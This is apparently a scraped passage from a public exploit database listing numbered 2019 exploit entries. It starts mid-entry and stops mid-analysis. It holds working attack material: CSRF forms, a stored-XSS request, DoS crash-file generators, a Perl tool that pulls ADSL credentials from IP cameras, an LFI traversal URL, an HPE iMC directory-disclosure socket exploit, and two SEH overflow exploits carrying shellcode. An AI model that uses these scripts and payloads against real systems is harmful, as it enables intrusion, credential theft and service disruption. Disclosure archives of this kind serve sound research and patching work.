for="sig">Signature</label> <textarea name="sig" id="editor" style="width: 100%; height: 300px; max-width: 100%; min-width: 100%;"></textarea> <br><br> <input type="submit" 
name="edit" value="Save Changes"> </form> <!-- Edit Signature CSRF End --> <!-- Change Password CSRF --> <form id="LAYER_form" action="http://localhost/profile.php/cmd/password" method="POST" style="padding: 35px;"> <label for="current_password">Current Password</label> <input type="password" name="current_password" id="current_password"> <label for="new_password">New Password</label> <input type="password" name="new_password" id="new_password"> <br><br> <input type="submit" name="edit" value="Save Changes"> </form> <!-- Change Password CSRF End --> <!-- Forgot Password CSRF --> <form action="http://localhost/members.php/cmd/forgotpassword" method="POST" id="LAYER_form" style="padding: 25px;"> <label for="email">Email</label> <input type="text" name="email" id="email" class="form-control"> <br><br> <input type="submit" name="forget" value="Send Email" class="btn btn-default"> </form> <!-- Forgot Password CSRF End --> <!-- Reset Password CSRF --> <form action="http://localhost/members.php/cmd/resetpassword" method="POST" id="LAYER_form" style="padding: 25px;"> <label for="password">Password</label> <input type="password" name="password" id="password" class="form-control"> <label for="a_password">Confirm Password</label> <input type="password" name="a_password" id="a_password" class="form-control"> <br><br> <input type="submit" name="reset" value="Reset Password" class="btn btn-default"> </form> <!-- Reset Password CSRF End --> <!-- Register Account CSRF --> <form action="http://localhost/members.php/cmd/register" method="POST" style="padding: 25px;"> <label for="username">Username</label> <input type="text" name="username" value="" id="username" class="form-control"> <label for="password">Password</label> <input type="password" name="password" id="password" class="form-control"> <label for="a_password">Confirm Password</label> <input type="password" name="a_password" id="a_password" class="form-control"> <label for="email">Email</label> <input type="text" 
name="email" value="" id="email" class="form-control"> <label for="LayerBB_captcha">Are you a bot?</label><br> <img src="http://localhost/public/img/captcha.php" alt="LayerBB Captcha"><br><input type="text" id="LayerBB_captcha" name="LayerBB_captcha"> <br><br> <input type="submit" name="register" value="Register" class="btn btn-default"> By clicking "Register", you agree to abide by the forum rules located <a href="http://localhost/members.php/cmd/rules">here</a>. </form> <!-- Register Account CSRF End --> 3. Solution: Update to 1.1.4
  14. # Exploit Title: GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting # Author: Cakes # Discovery Date: 2019-09-19 # Vendor Homepage: https://goautodial.org/ # Software Link: https://downloads2.goautodial.org/centos/7/isos/x86_64/GOautodial-4-x86_64-Pre-Release-20180929-0618.iso # Tested Version: 4.0 # Tested on OS: CentOS 7 # CVE: N/A # Description: # Simple stored XSS, reachable after authenticating to the application. # POST Request POST /php/CreateEvent.php HTTP/1.1 Host: 10.0.0.25 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.0.0.25/events.php Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 69 Cookie: PHPSESSID=b9jgg31ufmmgf84qdd6jq6v3i1 Connection: close DNT: 1 title=%3Cscript%3Ealert(%22TEST%22)%3B%3C%2Fscript%3E&color=%2300c0ef
  15. # Exploit Title: SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service (DoS) # Exploit Author: Emilio Revelo # Date: 2019-09-20 # Software Link : http://www.nsauditor.com/downloads/spotie_setup.exe # Tested on: Windows 10 Pro x64 es # Steps to produce the DoS: # 1.- Run perl script : perl SpotIE.pl # 2.- Open SpotIE.txt and copy the content to clipboard # 3.- Open SpotIE Internet Explorer Password Recovery # 4.- Navigate to Register -> Enter the registration name and key below... # 5.- Paste ClipBoard on "Key:" # 7.- OK # 8.- Crashed!! #!/usr/local/bin/perl use strict; use warnings; my $filename = 'SpotIE.txt'; open(my $fh, '>', $filename) or die "Could not open file '$filename' $!"; print $fh "E"x256; close $fh; print "Done!\n"; print "File: SpotIE.txt\n"
  16. # Exploit Title: InputMapper < 1.6.10 Local Denial of Service # Date: 20.09.2019 # Vendor Homepage: https://inputmapper.com/ # Software Link: https://inputmapper.com/downloads/category/2-input-mapper # Exploit Author: elkoyote07 # Tested Version: 1.6.10 # Tested on: Windows 10 x64 # 1.- Start Input Mapper # 2.- Click on Guest (Top left) # 3.- Click on Login # 3.- Copy the content of exploit.txt in the Username field # 4.- Once copied double-click on Username field # 5.- Happy crash :) #!/usr/bin/python t = "A" * 15000 try: f=open("exploit.txt","w") f.write(t) f.close() print "Done" except: print "Error"
  17. #!/usr/bin/perl -w # # Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure # # Copyright 2019 (c) Todor Donev <todor.donev at gmail.com> # # # # [ # # [ Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure # # [ ============================================================= # # [ Exploit Author: Todor Donev 2019 <[email protected]> # # [ # # [ Disclaimer: # # [ This or previous programs are for Educational purpose # # [ ONLY. Do not use it without permission. The usual # # [ disclaimer applies, especially the fact that Todor Donev # # [ is not liable for any damages caused by direct or # # [ indirect use of the information or functionality provided # # [ by these programs. The author or any Internet provider # # [ bears NO responsibility for content or misuse of these # # [ programs or any derivatives thereof. By using these programs # # [ you accept the fact that any damage (dataloss, system crash, # # [ system compromise, etc.) caused by the use of these programs # # [ are not Todor Donev's responsibility. # # [ # # [ Use them at your own risk! # # [ # # [ Initializing the browser # # [ Server: thttpd/2.25b 29dec2003 # # [ The target is vulnerable # # [ # # [ Directory Traversal # # [ # # [ /cgi-bin/.. 
# # [ /cgi-bin/adsl_init.cgi # # [ /cgi-bin/chkwifi.cgi # # [ /cgi-bin/ddns_start.cgi # # [ /cgi-bin/getadslattr.cgi # # [ /cgi-bin/getddnsattr.cgi # # [ /cgi-bin/getinetattr.cgi # # [ /cgi-bin/getinterip.cgi # # [ /cgi-bin/getnettype.cgi # # [ /cgi-bin/getupnp.cgi # # [ /cgi-bin/getwifi.cgi # # [ /cgi-bin/getwifiattr.cgi # # [ /cgi-bin/ptzctrldown.cgi # # [ /cgi-bin/ptzctrlleft.cgi # # [ /cgi-bin/ptzctrlright.cgi # # [ /cgi-bin/ptzctrlup.cgi # # [ /cgi-bin/ptzctrlzoomin.cgi # # [ /cgi-bin/ptzctrlzoomout.cgi # # [ /cgi-bin/ser.cgi # # [ /cgi-bin/setadslattr.cgi # # [ /cgi-bin/setddnsattr.cgi # # [ /cgi-bin/setinetattr.cgi # # [ /cgi-bin/setwifiattr.cgi # # [ /cgi-bin/testwifi.cgi # # [ /cgi-bin/upnp_start.cgi # # [ /cgi-bin/upnp_stop.cgi # # [ /cgi-bin/wifi_start.cgi # # [ /cgi-bin/wifi_stop.cgi # # [ # # [ File Reading # # [ # # [ var ip = "" ; # # [ var adslenable = "" ; # # [ var username = "hacker" ; # # [ var password = "133337" ; # # [ var dnsauto = "1" ; # # [ var dns1 = "8.8.8.8" ; # # [ var dns2 = "8.8.4.4" ; # # use strict; use HTTP::Request; use LWP::UserAgent; use WWW::UserAgent::Random; use HTML::TreeBuilder; $| = 1; my $host = shift || 'https://192.168.1.1/'; # Full path url to the store print "\033[2J"; #clear the screen print "\033[0;0H"; #jump to 0,0 my $banner = 
"\x5b\x20\x0a\x5b\x20\x48\x69\x73\x69\x6c\x69\x63\x6f\x6e\x20\x48\x69\x49\x70\x63\x61\x6d\x20\x56\x31\x30\x30\x52\x30\x30\x33\x20\x52\x65\x6d\x6f\x74\x65\x20\x41\x44\x53\x4c\x20\x43\x72\x65\x64\x65\x6e\x74\x69\x61\x6c\x73\x20\x44\x69\x73\x63\x6c\x6f\x73\x75\x72\x65\x0a\x5b\x20\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x5b\x20\x45\x78\x70\x6c\x6f\x69\x74\x20\x41\x75\x74\x68\x6f\x72\x3a\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x20\x32\x30\x31\x39\x20\x3c\x74\x6f\x64\x6f\x72\x2e\x64\x6f\x6e\x65\x76\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x3e\x0a\x5b\x0a\x5b\x20\x20\x44\x69\x73\x63\x6c\x61\x69\x6d\x65\x72\x3a\x0a\x5b\x20\x20\x54\x68\x69\x73\x20\x6f\x72\x20\x70\x72\x65\x76\x69\x6f\x75\x73\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x61\x72\x65\x20\x66\x6f\x72\x20\x45\x64\x75\x63\x61\x74\x69\x6f\x6e\x61\x6c\x20\x70\x75\x72\x70\x6f\x73\x65\x0a\x5b\x20\x20\x4f\x4e\x4c\x59\x2e\x20\x44\x6f\x20\x6e\x6f\x74\x20\x75\x73\x65\x20\x69\x74\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x70\x65\x72\x6d\x69\x73\x73\x69\x6f\x6e\x2e\x20\x54\x68\x65\x20\x75\x73\x75\x61\x6c\x20\x0a\x5b\x20\x20\x64\x69\x73\x63\x6c\x61\x69\x6d\x65\x72\x20\x61\x70\x70\x6c\x69\x65\x73\x2c\x20\x65\x73\x70\x65\x63\x69\x61\x6c\x6c\x79\x20\x74\x68\x65\x20\x66\x61\x63\x74\x20\x74\x68\x61\x74\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x0a\x5b\x20\x20\x69\x73\x20\x6e\x6f\x74\x20\x6c\x69\x61\x62\x6c\x65\x20\x66\x6f\x72\x20\x61\x6e\x79\x20\x64\x61\x6d\x61\x67\x65\x73\x20\x63\x61\x75\x73\x65\x64\x20\x62\x79\x20\x64\x69\x72\x65\x63\x74\x20\x6f\x72\x20\x0a\x5b\x20\x20\x69\x6e\x64\x69\x72\x65\x63\x74\x20\x75\x73\x65\x20\x6f\x66\x20\x74\x68\x65\x20\x20\x69\x6e\x66\x6f\x72\x6d\x61\x74\x69\x6f\x6e\x20\x6f\x72\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x61\x6c\x69\x74\x79\x20\x70\x72\x6f\x76\x69\x64\x65\x64\x0a\x5b\x20\x20\x62\x79\x2
0\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x2e\x20\x54\x68\x65\x20\x61\x75\x74\x68\x6f\x72\x20\x6f\x72\x20\x61\x6e\x79\x20\x49\x6e\x74\x65\x72\x6e\x65\x74\x20\x70\x72\x6f\x76\x69\x64\x65\x72\x20\x0a\x5b\x20\x20\x62\x65\x61\x72\x73\x20\x4e\x4f\x20\x72\x65\x73\x70\x6f\x6e\x73\x69\x62\x69\x6c\x69\x74\x79\x20\x66\x6f\x72\x20\x63\x6f\x6e\x74\x65\x6e\x74\x20\x6f\x72\x20\x6d\x69\x73\x75\x73\x65\x20\x6f\x66\x20\x74\x68\x65\x73\x65\x20\x0a\x5b\x20\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x6f\x72\x20\x61\x6e\x79\x20\x64\x65\x72\x69\x76\x61\x74\x69\x76\x65\x73\x20\x74\x68\x65\x72\x65\x6f\x66\x2e\x20\x42\x79\x20\x75\x73\x69\x6e\x67\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x0a\x5b\x20\x20\x79\x6f\x75\x20\x61\x63\x63\x65\x70\x74\x20\x74\x68\x65\x20\x66\x61\x63\x74\x20\x74\x68\x61\x74\x20\x61\x6e\x79\x20\x64\x61\x6d\x61\x67\x65\x20\x28\x64\x61\x74\x61\x6c\x6f\x73\x73\x2c\x20\x73\x79\x73\x74\x65\x6d\x20\x63\x72\x61\x73\x68\x2c\x20\x0a\x5b\x20\x20\x73\x79\x73\x74\x65\x6d\x20\x63\x6f\x6d\x70\x72\x6f\x6d\x69\x73\x65\x2c\x20\x65\x74\x63\x2e\x29\x20\x63\x61\x75\x73\x65\x64\x20\x62\x79\x20\x74\x68\x65\x20\x75\x73\x65\x20\x20\x6f\x66\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x0a\x5b\x20\x20\x61\x72\x65\x20\x6e\x6f\x74\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x27\x73\x20\x72\x65\x73\x70\x6f\x6e\x73\x69\x62\x69\x6c\x69\x74\x79\x2e\x0a\x5b\x20\x20\x20\x0a\x5b\x20\x55\x73\x65\x20\x74\x68\x65\x6d\x20\x61\x74\x20\x79\x6f\x75\x72\x20\x6f\x77\x6e\x20\x72\x69\x73\x6b\x21\x0a\x5b\x0a"; print $banner; print "[ e.g. 
perl $0 https://target:port/\n" and exit if ($host !~ m/^http/); print "[ Initializing the browser\n"; my $user_agent = rand_ua("browsers"); my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 }); $browser->timeout(30); $browser->agent($user_agent); my $target = $host."/cgi-bin/"; my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]); my $response = $browser->request($request) or die "[ Exploit Failed: $!"; print "[ 401 Unauthorized!\n" and exit if ($response->code eq '401'); print "[ Server: ", $response->header('Server'), "\n"; if (defined ($response->as_string()) && ($response->as_string() =~ m/<H2>Index of \/cgi-bin\/<\/H2>/)){ print "[ The target is vulnerable\n"; print "[\n[ Directory Traversal\n"; my $tree = HTML::TreeBuilder->new_from_content($response->as_string()); my @files = $tree->look_down(_tag => 'a'); print "[ ", $_->attr('href'), "\n" for @files; my $target = $host."/cgi-bin/getadslattr.cgi"; my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]); my $response = $browser->request($request) or die "[ Exploit Failed: $!"; print "[\n[ File Reading\n"; print "[ ", $_, "\n" for split(/\n/,$response->content()); } else { print "[ Exploit failed! The target isn't vulnerable\n"; exit; }
  18. # Exploit Title: Authenticated Local File Inclusion (LFI) in GilaCMS # Google Dork: N/A # Date: 04-08-2019 # Exploit Author: Sainadh Jamalpur # Vendor Homepage: https://github.com/GilaCMS/gila # Software Link: https://github.com/GilaCMS/gila # Version: 1.10.9 # Tested on: XAMPP version 3.2.2 in Windows 10 64bit, # CVE : CVE-2019-16679 *********** *Steps to reproduce the Vulnerability* ************* Log in to the application as an admin (or equivalently privileged) user and open the link below http://localhost/gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts ################################################################
  19. #!/opt/local/bin/python2.7 # Exploit Title: HPE Intelligent Management Center dbman Command 10001 Information Disclosure # Date: 22-09-2019 # Exploit Author: Rishabh Sharma (Linkedin: rishabh2241991) # Vendor Homepage: www.hpe.com # Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber= # Tested on Version: iMC_PLAT_7.1_E0302_Standard_Windows and iMC_PLAT_7.2_E0403_Std_Win # Tested on: Windows 7 # CVE : CVE-2019-5392 # Conversion of Nessus Plugin to Python Exploit # Nessus Plugin Name: hp_imc_dbman_cmd_10001_info_disclosure.nasl # Description: This vulnerability allows a remote attacker to view the contents of arbitrary directories under the security context of the SYSTEM or root user. # See Also: https://www.tenable.com/plugins/nessus/118038 from pyasn1.type.univ import * from pyasn1.type.namedtype import * from pyasn1.codec.ber import encoder import struct import binascii import socket, sys import sys import re if len(sys.argv) != 4: print "USAGE: python %s <ip> <port> <directory>" % (sys.argv[0]) sys.exit(1) else: ip = sys.argv[1] port = int(sys.argv[2]) # Default Port 2810 directory = sys.argv[3] payload = directory.replace("\\","\\\\") opcode = 10001 try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "Socket Created.." 
except socket.error: print 'Failed to create socket' sys.exit() victim_address = (ip,port) print('connecting to {} port {}'.format(*victim_address)) sock.connect((ip, port)) class DbmanMsg(Sequence): componentType = NamedTypes( NamedType('flag', Integer()), NamedType('dir', OctetString()) ) data = DbmanMsg() data['flag'] = 1 data['dir'] = payload encodeddata = encoder.encode(data, defMode=False) dataLen = len(encodeddata) values = (opcode, dataLen, encodeddata) s = struct.Struct(">ii%ds" % dataLen) packed_data = s.pack(*values) print 'Format string :', s.format print 'Uses :',s.size, 'bytes' print 'Packed Value :', binascii.hexlify(packed_data) print '\n' print 'Sending Payload...' sock.send(packed_data) BUFF_SIZE = 4000 res = sock.recv(BUFF_SIZE) rec = len(res) if (rec == 0): print "No data in the directory" else: print "Data Recived: "+str(rec) a = repr(res) b = a b = re.sub(r'(x\d\d)', '', b) b = re.sub(r'(\\x[\d].)', '', b) b = re.sub(r'(\\x..)', '', b) replacestring = ['"','\\n','\\r','\\t','0'] print "Data in "+payload+" Directory: \n" for r in replacestring: b = b.replace(r,'') b = b.replace("'","") #print b #Remove '#' if output results is not proper matches = re.finditer(r"([\\]*)([.[a-zA-Z\d\s]*)", b, re.MULTILINE) for matchNum, match in enumerate(matches, start=1): print match.group(2) print "Done..." sock.close()
  20. Exploit Title: SockPuppet 3 Date: September 8, 2019 Exploit Author: Umang Raghuvanshi Vendor Homepage: https://apple.com Software Link: https://ipsw.me/ Version: iOS 11.0—12.2, iOS 12.4 Tested on: iOS 11.0—12.2, iOS 12.4 CVE: CVE-2019-8605 This is an alternative (and complete) exploit for CVE-2019-8605. I have only implemented the exploit and do not claim any rights for discovering and/or publishing the vulnerability. The actual exploit code is in “SockPuppet3.cpp”, other files are either helpers or documentation. This exploit [1] has already been verified in production several times [2] [3], however, I can assist in additional verification if required. POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47409.zip [1] https://gist.github.com/ur0/a9b2d8088479a70665f729c4e9bf8720 [2] https://twitter.com/Pwn20wnd/status/1163392040073191426 [3] https://twitter.com/electra_team/status/1163658714840047618
  21. #!/usr/bin/python # Exploit Title: DeviceViewer 3.12.0.1 - 'creating user' DOS buffer overflow # Date: 9/23/2019 # Exploit Author: x00pwn # Vendor Homepage: http://www.sricam.com/ # Software Link: http://download.sricam.com/Manual/DeviceViewer.exe # Version: v3.12.0.1 # Tested on: Windows 7 # Steps to reproduce: # 1. Generate a malicious payload via the POC # 2. In the Sricam application create a new user # 3. When creating a new user, set the username as the malicious payload # 4. Observe a program DOScrash payload = "A" * 5000 try: evilCreate =open("exploit.txt","w") print(""" DeviceViewer 3.12.0.1 DOS exploit POC Author: Nu11pwn """) print("[x] Creating malicious file") evilCreate.write(payload) evilCreate.close() print("[x] Malicious file create") print("[x] When creating a new user, set the username to the file contents") print("[x] Watch the program crash") except: print("[!] File failed to be created")
  22. import socket from struct import * # Exploit Title: File sharing wizard 'post' remote SEH overflow # Date: 9/23/2019 # Exploit Author: x00pwn # Software Link: https://file-sharing-wizard.soft112.com/ # Version: 1.5.0 # Tested on: Windows 7 # CVE : CVE-2019-16724 # File-sharing-wizard-seh #----------------------------------------------# # Bad characters: \x00 # # SEH value: 0x909032EB (JMP short) # # NSEH value: 0x7c38a67f (POP POP RET) # #----------------------------------------------# # Assigned CVE ID : CVE-2019-16724 victim_host = "10.0.0.17" victim_port = 80 # msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python -v shellcode EXITFUNC=seh shellcode = "" shellcode += "\xd9\xc7\xd9\x74\x24\xf4\xba\x65\x1d\x84\xe1\x5f" shellcode += "\x29\xc9\xb1\x31\x31\x57\x18\x03\x57\x18\x83\xef" shellcode += "\x99\xff\x71\x1d\x89\x82\x7a\xde\x49\xe3\xf3\x3b" shellcode += "\x78\x23\x67\x4f\x2a\x93\xe3\x1d\xc6\x58\xa1\xb5" shellcode += "\x5d\x2c\x6e\xb9\xd6\x9b\x48\xf4\xe7\xb0\xa9\x97" shellcode += "\x6b\xcb\xfd\x77\x52\x04\xf0\x76\x93\x79\xf9\x2b" shellcode += "\x4c\xf5\xac\xdb\xf9\x43\x6d\x57\xb1\x42\xf5\x84" shellcode += "\x01\x64\xd4\x1a\x1a\x3f\xf6\x9d\xcf\x4b\xbf\x85" shellcode += "\x0c\x71\x09\x3d\xe6\x0d\x88\x97\x37\xed\x27\xd6" shellcode += "\xf8\x1c\x39\x1e\x3e\xff\x4c\x56\x3d\x82\x56\xad" shellcode += "\x3c\x58\xd2\x36\xe6\x2b\x44\x93\x17\xff\x13\x50" shellcode += "\x1b\xb4\x50\x3e\x3f\x4b\xb4\x34\x3b\xc0\x3b\x9b" shellcode += "\xca\x92\x1f\x3f\x97\x41\x01\x66\x7d\x27\x3e\x78" shellcode += "\xde\x98\x9a\xf2\xf2\xcd\x96\x58\x98\x10\x24\xe7" shellcode += "\xee\x13\x36\xe8\x5e\x7c\x07\x63\x31\xfb\x98\xa6" shellcode += "\x76\xfd\x69\x7b\x62\x6a\xd0\xee\xcf\xf6\xe3\xc4" shellcode += "\x13\x0f\x60\xed\xeb\xf4\x78\x84\xee\xb1\x3e\x74" shellcode += "\x82\xaa\xaa\x7a\x31\xca\xfe\x18\xd4\x58\x62\xf1" shellcode += "\x73\xd9\x01\x0d" nseh = pack ('<I',0x909032EB) # Short jump forward 32 places into NOP sled seh = pack('I',0x7c38a67f) # POP POP RET # 0x7c38a67f : pop ecx 
# pop ecx # ret | {PAGE_EXECUTE_READ} [MSVCR71.dll] # ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.6030.0 (C:\Program Files (x86)\File Sharing Wizard\bin\MSVCR71.dll) exploit_payload = "A" * 1040 exploit_payload += nseh # JMP short exploit_payload += seh # POPPOPRET exploit_payload += "\x90" * 100 # NOPSLED exploit_payload += shellcode # popping calc.exe exploit_payload += "D" *(5000 - len(exploit_payload)) payload_header = "POST " + exploit_payload payload_header +=" HTTP/1.0\r\n\r\n" # overflowed SEH handler - 42386942 : [*] Exact match at offset 1044 try: print(""" -------------------------------- CVE-2019-16724 proof of concept File sharing wizard SEH overflow -------------------------------- """) expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print("[x] Setting up a socket connection") expl.connect((victim_host, victim_port)) print("[x] Establishing a connection to the victim") expl.send(payload_header) print("[x] Sending ") except: print("[!] Error establishing a connection") print("[!] Error sending exploit")
  23. #!/usr/bin/python # Exploit Title: Easy File Sharing Web Server 7.2 local SEH overflow # Date: 9/23/2019 # Exploit Author: x00pwn # Vendor Homepage: http://www.sharing-file.com/ # Software Link: http://www.sharing-file.com/efssetup.exe # Version: 7.2 # Tested on: Windows 7 # Exploit summary: When adding a new user to the application, you can exploit a local SEH buffer overflow # by creating a malicious username, this exploit POC will create a malicious text file # with the contents to execute arbitrary code. # Author : Nu11pwn badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") # found bad chars - "\x00\x0a\x0d" shellcode = "" shellcode += "\xbb\xc4\x1c\xb2\xd3\xdd\xc2\xd9\x74\x24\xf4\x5e" shellcode += "\x2b\xc9\xb1\x31\x31\x5e\x13\x83\xc6\x04\x03\x5e" shellcode += "\xcb\xfe\x47\x2f\x3b\x7c\xa7\xd0\xbb\xe1\x21\x35" shellcode += "\x8a\x21\x55\x3d\xbc\x91\x1d\x13\x30\x59\x73\x80" shellcode += "\xc3\x2f\x5c\xa7\x64\x85\xba\x86\x75\xb6\xff\x89" shellcode += 
"\xf5\xc5\xd3\x69\xc4\x05\x26\x6b\x01\x7b\xcb\x39" shellcode += "\xda\xf7\x7e\xae\x6f\x4d\x43\x45\x23\x43\xc3\xba" shellcode += "\xf3\x62\xe2\x6c\x88\x3c\x24\x8e\x5d\x35\x6d\x88" shellcode += "\x82\x70\x27\x23\x70\x0e\xb6\xe5\x49\xef\x15\xc8" shellcode += "\x66\x02\x67\x0c\x40\xfd\x12\x64\xb3\x80\x24\xb3" shellcode += "\xce\x5e\xa0\x20\x68\x14\x12\x8d\x89\xf9\xc5\x46" shellcode += "\x85\xb6\x82\x01\x89\x49\x46\x3a\xb5\xc2\x69\xed" shellcode += "\x3c\x90\x4d\x29\x65\x42\xef\x68\xc3\x25\x10\x6a" shellcode += "\xac\x9a\xb4\xe0\x40\xce\xc4\xaa\x0e\x11\x5a\xd1" shellcode += "\x7c\x11\x64\xda\xd0\x7a\x55\x51\xbf\xfd\x6a\xb0" shellcode += "\x84\xfc\x9b\x09\x10\x68\x02\xf8\x59\xf4\xb5\xd6" shellcode += "\x9d\x01\x36\xd3\x5d\xf6\x26\x96\x58\xb2\xe0\x4a" shellcode += "\x10\xab\x84\x6c\x87\xcc\x8c\x0e\x46\x5f\x4c\xff" shellcode += "\xed\xe7\xf7\xff" # Log data, item 69 # Address=0BADF00D # Message= 0x10000000 | 0x10050000 | 0x00050000 | False | False | False | False | False | -1.0- [ImageLoad.dll] (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll) # Log data, item 24 # Address=100195F2 # Message= 0x100195f2 : pop esi # pop ecx # ret | {PAGE_EXECUTE_READ} [ImageLoad.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll) nseh = "\xEB\x06\x90\x90" seh = "\xF2\x95\x01\x10" payload = "A" * 4059 payload += nseh payload += seh payload += "\x90" * 16 payload += shellcode payload += "D" *4000 # SEH chain of main thread, item 1 # Address=46336646 # SE handler=*** CORRUPT ENTRY *** # Log data, item 34 # Address=0BADF00D # Message= SEH record (nseh field) at 0x0018a938 overwritten with normal pattern : 0x46336646 (offset 4059), followed by 933 bytes of cyclic data after the handler # [*] Exact match at offset 4059 try: evilCreate =open("exploit.txt","w") print(""" Easy File Sharing web server SEH overflow """) print("[x] Creating malicious file") evilCreate.write(payload) evilCreate.close() print("[x] 
Malicious file create") print("[x] Go to user accounts and add a new user with malicious name") print("[x] Watch the program crash") except: print("[!] File failed to be created")
  24. # Exploit Title: Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection # Date: 23/09/2018 # Author: Nassim Asrir # Vendor Homepage: https://www.pfsense.org/ # Contact: [email protected] | https://www.linkedin.com/in/nassim-asrir-b73a57122/ # CVE: CVE-2019-16701 # Tested On: Windows 10(64bit) | Pfsense 2.3.4 / 2.4.4-p3 ###################################################################################################### 1 : About Pfsense: ================== pfSense is a free and open source firewall and router that also features unified threat management, load balancing, multi WAN, and more. 2 : Technical Analysis: ======================= pfSense allows users (uid=0) to make remote procedure calls over HTTP (XMLRPC), and the XMLRPC interface exposes some critical methods that let an authenticated user who passes the privilege check shown below execute OS commands. XMLRPC methods: pfsense.exec_shell pfsense.exec_php pfsense.filter_configure pfsense.interfaces_carp_configure pfsense.backup_config_section pfsense.restore_config_section pfsense.merge_config_section pfsense.merge_installedpackages_section_xmlrpc pfsense.host_firmware_version pfsense.reboot pfsense.get_notices system.listMethods system.methodHelp system.methodSignature As the listing shows, two methods are of particular interest: pfsense.exec_shell and pfsense.exec_php. 2 : Static Analysis: ==================== In the static analysis we will analyze the xmlrpc.php file. Line (73 - 82) This code checks whether the user has enough privileges (admin, or a regular user holding the HA-sync privilege). $user_entry = getUserEntry($username); /* * admin (uid = 0) is allowed * or regular user with necessary privilege */ if (isset($user_entry['uid']) && $user_entry['uid'] != '0' && !userHasPrivilege($user_entry, 'system-xmlrpc-ha-sync')) { log_auth("webConfigurator authentication error for '" . $username . "' from " . $this->remote_addr . " not enough privileges"); Line (137 - 146) This part of the code is the one of interest to us. 
